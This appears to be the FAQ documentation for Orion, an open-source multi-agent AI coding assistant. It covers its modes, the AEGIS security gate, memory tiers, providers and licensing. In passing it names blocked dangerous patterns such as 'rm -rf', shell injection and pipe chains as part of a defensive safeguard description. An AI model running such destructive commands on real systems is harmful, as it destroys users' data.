Orion is an open-source, multi-agent AI coding assistant. It uses three specialized agents (Builder, Reviewer, Governor) to generate, review, and govern code changes. Unlike single-shot AI tools, Orion has persistent memory and learns from your feedback over time.
Key differentiators:
- Multi-agent deliberation -- Three agents collaborate instead of one
- Persistent memory -- Learns across sessions, projects, and time
- AEGIS governance -- Hardened security gate prevents unsafe operations
- 11 LLM providers -- Use any provider, including local Ollama
- Self-hosted -- Runs entirely on your machine
Yes. Orion is released under AGPL-3.0 and is free to use, modify, and distribute under those terms. You still need to pay for LLM API usage (OpenAI, Anthropic, etc.) unless you use Ollama (free, local).
You need at least one LLM provider. Options:
- Paid: OpenAI, Anthropic, Google, Groq, Mistral, etc.
- Free (local): Ollama -- no API key, runs on your hardware
Orion can work with any programming language. It has enhanced support for:
- Python -- AST analysis, syntax validation, import checking
- JavaScript/TypeScript -- tree-sitter parsing
- Other languages -- General code analysis and generation
Your code is sent to the LLM provider you choose (OpenAI, Anthropic, etc.) for processing. If you want complete privacy, use Ollama -- everything stays on your machine.
Orion itself does not collect, transmit, or store any telemetry.
Only if:
- You are in
proorprojectmode - AEGIS validates the operation
- You approve the change (in
promode)
In safe mode, Orion cannot modify or delete any files.
Only in project mode, and only allowlisted commands. AEGIS blocks dangerous patterns like rm -rf, shell injection, and pipe chains.
AEGIS (Autonomous Execution Governance and Integrity System) is Orion's security core. It validates every operation against seven invariants (v7.0.0): workspace confinement, mode enforcement, action scope, risk validation, command execution safety, external access control, and network access control.
See AEGIS documentation for full details.
No. AEGIS cannot be disabled, bypassed, or reconfigured by AI agents or users. This is by design.
> /workspace /path/to/your/project
| Mode | Can Read | Can Write | Can Execute |
|---|---|---|---|
safe |
Yes | No | No |
pro |
Yes | Yes (approval) | No |
project |
Yes | Yes | Yes (allowlist) |
> /settings provider openai
> /settings model gpt-4o
Yes. Configure per-agent models in ~/.orion/config.yaml:
agents:
builder:
provider: openai
model: gpt-4o
reviewer:
provider: anthropic
model: claude-3-5-sonnet-20241022> /undo
Orion creates git savepoints before changes, so you can always revert.
After Orion completes a task, you can rate it 1-5:
- 5 -- Excellent, exactly what I needed
- 4 -- Good, minor adjustments needed
- 3 -- Acceptable, could be better
- 2 -- Poor, significant issues
- 1 -- Bad, completely wrong
Ratings drive the learning system -- high ratings become success patterns, low ratings become anti-patterns.
Three tiers of memory:
- Session -- Current conversation (RAM, lost on exit)
- Project -- Workspace-specific patterns (JSON, days to weeks)
- Institutional -- Cross-project wisdom (SQLite, months to years)
- Project memory:
.orion/memory/in each workspace - Institutional memory:
~/.orion/institutional.db
Yes:
> /memory clear session # Clear current session
> /memory clear project # Clear project patterns
> /memory clear institutional # Clear all learned patterns
- Session memory: No (current conversation only)
- Project memory: No (per-workspace)
- Institutional memory: Yes (shared across all projects)
- Start the API server:
uvicorn orion.api.server:app --port 8001 - Start the web frontend:
cd orion-web && npm run dev - Open
http://localhost:3001
Ensure the API server is running and the port matches the .env.local configuration. See Troubleshooting.
Under AGPL-3.0, you must share your modifications. For proprietary use without AGPL obligations, contact info@phoenixlink.co.za for a commercial license.
AGPL-3.0 requires that users of your SaaS have access to the source code. For SaaS without this requirement, you need a commercial license.
Yes. All contributions require a signed Contributor License Agreement. See CLA.md.
Common causes:
- LLM latency -- Cloud providers add network latency. Try Ollama for local inference.
- Table of Three -- Multi-agent deliberation takes 3x a single call. Disable with
enable_table_of_three: falsefor speed. - Large codebase -- Repository mapping takes time on large projects.
- Use a faster model (GPT-3.5-turbo, Groq's Llama 3)
- Disable Table of Three for simple tasks
- Use Ollama for zero network latency
- Reduce
max_tokens
See CONTRIBUTING.md. Key steps:
- Fork the repository
- Sign the CLA
- Create a feature branch
- Submit a pull request
Do not use GitHub Issues for security vulnerabilities.
Email: info@phoenixlink.co.za
Next: Troubleshooting | Getting Started